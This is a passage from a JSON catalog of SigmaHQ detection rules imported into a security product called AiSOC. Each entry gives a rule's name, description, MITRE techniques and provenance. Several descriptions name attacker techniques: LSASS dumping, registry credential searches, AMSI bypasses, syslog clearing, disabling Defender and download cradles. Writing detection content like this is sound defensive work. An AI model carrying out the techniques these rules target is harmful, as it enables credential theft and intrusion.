executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" } }, { "id": "sigmahq-sigma-df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "type": "detection", "name": "Suspicious Non PowerShell WSMAN COM Provider", "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-non-powershell-wsman-com-provider.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" } }, { "id": "sigmahq-sigma-dfa03a09-8b92-4d83-8e74-f72839b1c407", "type": "detection", "name": "Potentially Suspicious Child Processes Spawned by ConHost", "description": "Detects suspicious child processes related to Windows Shell utilities spawned by `conhost.exe`, which could indicate malicious activity using trusted system components.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1202", "T1218" ], "log_source": 
null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-child-processes-spawned-by-conhost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dfa03a09-8b92-4d83-8e74-f72839b1c407", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_conhost_susp_winshell_child_process.yml" } }, { "id": "sigmahq-sigma-dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "type": "detection", "name": "Potential Persistence Via Shim Database Modification", "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-shim-database-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml" } }, { "id": "sigmahq-sigma-dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "type": "detection", "name": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-hotfix-updates-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_hotfix.yml" } }, { "id": "sigmahq-sigma-dfe8b941-4e54-4242-b674-6b613d521962", "type": "detection", "name": "Startup Item File Created - MacOS", "description": "Detects the creation of a startup item plist file that automatically gets executed at boot initialization to establish persistence.\nAdversaries may use startup items automatically executed at boot initialization to establish persistence.\nStartup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": 
"_quarantine", "mitre_techniques": [ "T1037.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/startup-item-file-created-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dfe8b941-4e54-4242-b674-6b613d521962", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/file_event/file_event_macos_susp_startup_item_created.yml" } }, { "id": "sigmahq-sigma-dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", "type": "detection", "name": "Shell Process Spawned by Java.EXE", "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-process-spawned-by-java-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_susp_child_process_2.yml" } }, { "id": "sigmahq-sigma-e01fa958-6893-41d4-ae03-182477c5e77d", "type": "detection", "name": "Remote Access Tool - RURAT Execution From Unusual Location", "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual 
location (outside of 'C:\\Program Files')", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-rurat-execution-from-unusual-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e01fa958-6893-41d4-ae03-182477c5e77d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml" } }, { "id": "sigmahq-sigma-e021bbb5-407f-41f5-9dc9-1864c45a7a51", "type": "detection", "name": "Deployment Of The AppX Package Was Blocked By The Policy", "description": "Detects an appx package deployment that was blocked by the local computer policy.\nThe following events indicate that an AppX package deployment was blocked by a policy:\n- Event ID 441: The package deployment operation is blocked by the \"Allow deployment operations in special profiles\" policy.\n- Event ID 442: Deployments to non-system volumes are blocked by the \"Disable deployment of Windows Store apps to non-system volumes\" policy.\n- Event ID 453: Package blocked by a platform policy.\n- Event ID 454: Package blocked by a platform policy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deployment-of-the-appx-package-was-blocked-by-the-policy.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e021bbb5-407f-41f5-9dc9-1864c45a7a51", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml" } }, { "id": "sigmahq-sigma-e032f5bc-4563-4096-ae3b-064bab588685", "type": "detection", "name": "Potential Local File Read Vulnerability In JVM Based Application", "description": "Detects potential local file read vulnerability in JVM based apps.\nIf the exceptions are caused due to user input and contain path traversal payloads then it's a red flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-local-file-read-vulnerability-in-jvm-based-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e032f5bc-4563-4096-ae3b-064bab588685", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/jvm/java_local_file_read.yml" } }, { "id": "sigmahq-sigma-e043f529-8514-4205-8ab0-7f7d2927b400", "type": "detection", "name": "DNS Query To AzureWebsites.NET By Non-Browser Process", "description": "Detects a DNS query by a non browser process on the system to \"azurewebsites.net\". 
The latter was often used by threat actors as a malware hosting and exfiltration site.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-azurewebsites-net-by-non-browser-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e043f529-8514-4205-8ab0-7f7d2927b400", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_domain_azurewebsites.yml" } }, { "id": "sigmahq-sigma-e0565f5d-d420-4e02-8a68-ac00d864f9cf", "type": "detection", "name": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) 
as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1217" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/automated-collection-bookmarks-using-get-childitem-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" } }, { "id": "sigmahq-sigma-e074832a-eada-4fd7-94a1-10642b130e16", "type": "detection", "name": "HackTool - SafetyKatz Dump Indicator", "description": "Detects default lsass dump filename generated by SafetyKatz.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-safetykatz-dump-indicator.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e074832a-eada-4fd7-94a1-10642b130e16", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_safetykatz.yml" } }, { "id": 
"sigmahq-sigma-e0813366-0407-449a-9869-a2db1119dc41", "type": "detection", "name": "Suspicious Printer Driver Empty Manufacturer", "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-printer-driver-empty-manufacturer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0813366-0407-449a-9869-a2db1119dc41", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" } }, { "id": "sigmahq-sigma-e09aed7a-09e0-4c9a-90dd-f0d52507347e", "type": "detection", "name": "Windows WebDAV User Agent", "description": "Detects WebDav DownloadCradle", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-webdav-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_downloadcradle_webdav.yml" 
} }, { "id": "sigmahq-sigma-e09eb557-96d2-4de9-ba2d-30f712a5afd3", "type": "detection", "name": "Commands to Clear or Remove the Syslog - Builtin", "description": "Detects specific commands commonly used to remove or empty the syslog", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/commands-to-clear-or-remove-the-syslog-builtin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_clear_syslog.yml" } }, { "id": "sigmahq-sigma-e0b06658-7d1d-4cd3-bf15-03467507ff7c", "type": "detection", "name": "Suspicious DotNET CLR Usage Log Artifact", "description": "Detects the creation of Usage Log files by the CLR (clr.dll). 
These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dotnet-clr-usage-log-artifact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" } }, { "id": "sigmahq-sigma-e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", "type": "detection", "name": "Enumeration for Credentials in Registry", "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/enumeration-for-credentials-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml" } }, { "id": "sigmahq-sigma-e0c69ebd-b54f-4aed-8ae3-e3467843f3f0", "type": "detection", "name": "Renamed Cloudflared.EXE Execution", "description": "Detects the execution of a renamed \"cloudflared\" binary.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-cloudflared-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0c69ebd-b54f-4aed-8ae3-e3467843f3f0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_cloudflared.yml" } }, { "id": "sigmahq-sigma-e0cfaecd-602d-41af-988d-f6ccebb2af26", "type": "detection", "name": "Suspicious Installer Package Child Process", "description": "Detects the execution of suspicious child processes from macOS installer package parent process. 
This includes osascript, JXA, curl and wget amongst other interpreters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1059.007", "T1071", "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-installer-package-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0cfaecd-602d-41af-988d-f6ccebb2af26", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_installer_susp_child_process.yml" } }, { "id": "sigmahq-sigma-e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", "type": "detection", "name": "Mesh Agent Service Installation", "description": "Detects a Mesh Agent service installation. 
Mesh Agent is used to remotely manage computers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mesh-agent-service-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml" } }, { "id": "sigmahq-sigma-e0d6c087-2d1c-47fd-8799-3904103c5a98", "type": "detection", "name": "AMSI Bypass Pattern Assembly GetType", "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/amsi-bypass-pattern-assembly-gettype.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" } }, { "id": "sigmahq-sigma-e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", 
"type": "detection", "name": "Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder", "description": "Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-communication-initiated-to-file-sharing-domains-from-process-located-in.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_susp_file_sharing_domains_susp_folders.yml" } }, { "id": "sigmahq-sigma-e13f668e-7f95-443d-98d2-1816a7648a7b", "type": "detection", "name": "Detected Windows Software Discovery", "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1518" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/detected-windows-software-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "e13f668e-7f95-443d-98d2-1816a7648a7b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml" } }, { "id": "sigmahq-sigma-e1561947-b4e3-4a74-9bdd-83baed21bdb5", "type": "detection", "name": "Invoke-Obfuscation Via Use Clip", "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-clip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" } }, { "id": "sigmahq-sigma-e15b518d-b4ce-4410-a9cd-501f23ce4a18", "type": "detection", "name": "Suspicious Creation with Colorcpl", "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-creation-with-colorcpl.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" } }, { "id": "sigmahq-sigma-e1693bc8-7168-4eab-8718-cdcaa68a1738", "type": "detection", "name": "Suspicious WMIC Execution Via Office Process", "description": "Office application called wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1047", "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-wmic-execution-via-office-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml" } }, { "id": "sigmahq-sigma-e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05", "type": "detection", "name": "Bitbucket Global Secret Scanning Rule Deleted", "description": "Detects Bitbucket global secret scanning rule deletion activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, 
"playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-global-secret-scanning-rule-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_global_secret_scanning_rule_deleted.yml" } }, { "id": "sigmahq-sigma-e173ad47-4388-4012-ae62-bd13f71c18a8", "type": "detection", "name": "Potential DLL Sideloading Via DeviceEnroller.EXE", "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-via-deviceenroller-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e173ad47-4388-4012-ae62-bd13f71c18a8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml" } }, { "id": "sigmahq-sigma-e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "type": 
"detection", "name": "Windows Defender Service Disabled - Registry", "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-service-disabled-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" } }, { "id": "sigmahq-sigma-e1d02b53-c03c-4948-b11d-4d00cca49d03", "type": "detection", "name": "Increased Failed Authentications Of Any Type", "description": "Detects when failed sign-ins have increased by 10% or more.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", 